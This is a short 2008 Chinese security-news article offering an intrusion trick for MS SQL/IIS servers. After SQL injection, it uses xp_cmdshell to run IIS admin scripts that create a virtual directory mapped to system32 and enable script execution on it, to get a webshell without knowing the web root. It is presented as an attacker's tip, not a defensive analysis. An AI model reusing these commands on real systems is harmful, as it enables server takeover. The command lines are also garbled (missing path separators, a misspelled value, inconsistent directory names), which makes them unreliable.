CNETNews 政府采购 网站联盟
ZDNet安全频道

安全频道首页>安全综合专题>无法获得Web绝对路径又一入侵方法

网络安全产品页

无法获得Web绝对路径又一入侵方法

ZDNet 安全频道频道 更新时间:2008-06-19 作者: 来源:SohuIT

本文关键词:绝对路径 WEB Win

  我们很多情况下都遇到SQL注入可以列目录和运行命 令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:



  exec master.dbo.xp_cmdshell ’cscript C:InterpubAdminScriptsmkwebdir.vbs -c localhost -w "l" -v "win","c:windowssystem32"’



  建立虚拟目录win,指向c:windowssystem32



  exec master.dbo.xp_cmdshell ’cscript C:InterpubAdminScriptsadsutil.vbs w3svc/1/root/win/Accessexecute Ture’



  让win句有解析asp脚本权 限



  exec master.dbo.xp_cmdshell "cscript C:InterpubAdminScriptsadsutil.vbs delete w3svc/1/root/h4x0r/"



  删除虚拟目录。



  找不到web绝对路径的一种解决办法!

安全频道 绝对路径 最新报道

安全频道 WEB 最新报道

安全频道 Win 最新报道

[an error occurred while processing this directive]